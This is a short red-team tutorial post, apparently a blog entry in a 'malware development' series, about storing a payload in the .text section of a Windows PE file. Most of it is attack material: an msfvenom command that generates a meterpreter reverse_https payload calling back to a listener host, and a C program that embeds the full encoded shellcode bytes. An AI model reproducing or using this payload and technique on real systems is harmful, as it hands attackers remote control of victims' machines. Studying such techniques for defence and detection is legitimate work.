Hello Friends
I’m Rem01x Penetration Tester Interested in Red Teaming and Reverse Engineering
In this time we will talk about how to store our payload in .text section in the PE File
First let’s Generate the payload from Msfvenom
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"
Now Let’s write a C Code that will store the Malicious payload in the .text secretion in the PE Structure
#include <stdio.h>
#include <Windows.h>
int main()
{
// Hello I'm the payload nice to meet you!
// I'm stored at the Text Section Here!
// msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"
unsigned char textshellcode[] =
"\\xb8\\xc9\\xe3\\x83\\xe1\\xdb\\xcc\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9"
"\\xb1\\x8a\\x83\\xc2\\x04\\x31\\x42\\x10\\x03\\x42\\x10\\x2b\\x16\\x7f"
"\\x09\\x24\\xd9\\x80\\xca\\x5a\\xeb\\x52\\x43\\x7f\\x6f\\xd8\\x06\\x4f"
"\\xfb\\x8c\\xaa\\x24\\xa9\\x24\\xbc\\x8d\\x04\\x63\\xf3\\x0e\\x13\\x19"
"\\xdb\\xc1\\xe4\\x72\\x27\\x40\\x99\\x88\\x74\\xa2\\xa0\\x42\\x89\\xa3"
"\\xe5\\x14\\xe7\\x4c\\xbb\\x2d\\x55\\x82\\xb7\\x70\\x66\\xa3\\x17\\xff"
"\\xd6\\xdb\\x12\\xc0\\x80\\x6f\\x51\\xc0\\xfe\\x04\\x31\\xe2\\xff\\xc9"
"\\x49\\xaa\\xe7\\xbd\\xc8\\xe2\\x6c\\x01\\xe2\\x0b\\xc5\\xf2\\x30\\x7f"
"\\xd7\\xd2\\x08\\xbf\\x19\\x15\\x67\\x93\\x9b\\x6e\\x40\\x0b\\xee\\x84"
"\\xb2\\xb6\\xe9\\x5f\\xc8\\x6c\\x7f\\x7f\\x6a\\xe6\\x27\\x5b\\x8a\\x2b"
"\\xb1\\x28\\x80\\x80\\xb5\\x76\\x85\\x17\\x19\\x0d\\xb1\\x9c\\x9c\\xc1"
"\\x33\\xe6\\xba\\xc5\\x18\\xbc\\xa3\\x5c\\xc5\\x13\\xdb\\xbe\\xa1\\xcc"
"\\x79\\xb5\\x40\\x1a\\xfd\\x36\\x9b\\x23\\xa3\\xa0\\x0a\\xb9\\x28\\x30"
"\\xbb\\x36\\xb8\\x5e\\x52\\xed\\x52\\xd2\\xd3\\x2b\\xa4\\x15\\xce\\x05"
"\\x71\\xba\\xa2\\x36\\xd6\\x6f\\xad\\xca\\xd8\\x8f\\x2d\\x60\\xb6\\xf5"
"\\x44\\x16\\x24\\x68\\xb8\\xd3\\x9a\\x5a\\xe6\\x33\\xae\\xfb\\x85\\x2a"
"\\x5e\\x8f\\x26\\xde\\xf6\\x54\\x99\\x69\\x69\\xde\\xbc\\x05\\x55\\x53"
"\\x5e\\xb5\\xb5\\x24\\xf3\\x19\\xee\\x9a\\xc2\\x6a\\x51\\xeb\\x0d\\xad"
"\\x2c\\x7b\\x3e\\xc1\\xcb\\x2c\\xdb\\x7b\\x5f\\xbb\\x57\\x53\\x69\\x0b"
"\\xad\\x85\\xa4\\x45\\xfc\\xec\\xe6\\xb1\\xb5\\x46\\xb3\\x8c\\x05\\x7b"
"\\x1b\\x62\\xff\\xe8\\x3e\\x5a\\xb8\\x8b\\xa3\\xf1\\x29\\x7d\\x04\\x53"
"\\xd3\\x0f\\x37\\x32\\x74\\x9e\\x98\\xf5\\xbc\\x70\\xd6\\xd5\\x93\\xed"
"\\x7e\\x74\\x66\\x87\\x51\\x40\\xb6\\x62\\x80\\x9d\\x98\\xbd\\xe9\\xdd"
"\\x8c\\x87\\x47\\xa4\\xeb\\x07\\xb2\\x05\\xa7\\x9d\\x3e\\xfa\\x14\\x0a"
"\\xfa\\xfd\\x9a\\xca\\x14\\x36\\x9a\\xca\\xe4\\xe7\\xee\\xae\\xa7\\x8d"
"\\x4f\\x4c\\x44\\x06\\x40\\xa2\\xd1\\x8c\\xcc\\x80\\xa0\\x1a\\x68\\x36"
"\\x04\\xc3\\x43\\x5f\\xd3\\x47\\x9c\\xf5\\x6b\\x2e\\x94\\x67\\x38\\xd6"
"\\x69\\x2e\\xa7\\x57\\x33\\x94\\x6b\\x0d\\xda\\x70\\x3a\\xe5\\x2a\\xb2"
"\\x88\\x7c\\x2b\\xf1\\x6b\\x24\\x8a\\xb6\\x30\\xe0\\x55\\x7f\\xb7\\x40"
"\\x0e\\x28\\x3e\\xff\\x08\\x29\\x95\\x76\\x52\\x85\\x7e\\x88\\x69\\xc2"
"\\xfb\\xdb\\xde\\x41\\x53\\x88\\xb6\\x0d\\xb0\\x7b\\x19\\xf5\\xb9\\x56"
"\\xf3\\x63\\x4c\\x07\\x94\\xf3\\x63\\xb7\\x64\\x7d\\x63\\xdd\\x60\\x2d"
"\\x0e\\x3e\\x3f\\xa5\\xbb\\x06\\x21\\xb3\\xbb\\x53\\x0e\\xef\\x10\\x08"
"\\xe7\\x67\\xba\\xa8\\x1f\\x03\\x3b\\x61\\x9a\\x33\\xb6\\x9d\\xcd\\x3b"
"\\x2a\\x9d\\x0d\\x54\\x09\\x6d\\x38\\x44\\x6e\\x58\\x0c\\xf1\\x5c\\x8a"
"\\xda\\xf9\\x5e\\x4a\\xb7\\xb9\\x36\\x4a\\x57\\x3a\\xc7\\x22\\x57\\x3a"
"\\x87\\xb2\\x04\\x52\\x5f\\x16\\xf9\\x47\\xa0\\x83\\x6d\\xd4\\x0c\\xa2"
"\\x75\\x8c\\xda\\xb4\\x59\\x33\\x1b\\xe7\\xcf\\x5b\\x09\\x91\\x79\\x79"
"\\xd2\\x48\\xfc\\xbe\\x59\\xbd\\x74\\x39\\xa3\\x82\\x0e\\x86\\xd6\\xe1"
"\\x49\\xc4\\x46\\x01\\x02\\x35\\x87\\x2e\\xe4\\xf0\\x4a\\xfe\\x36\\x35"
"\\x93\\xd0\\x09\\x17\\xd2\\x1e\\x6a\\xdc\\xe4\\xeb\\xc8\\x74\\x6f\\x13"
"\\x5e\\x86\\xba";
printf("Rem01x Malware Development Journey\\n");
printf("Hello I'm the Paylaod my address is: 0x%p", textshellcode);
return EXIT_SUCCESS;
}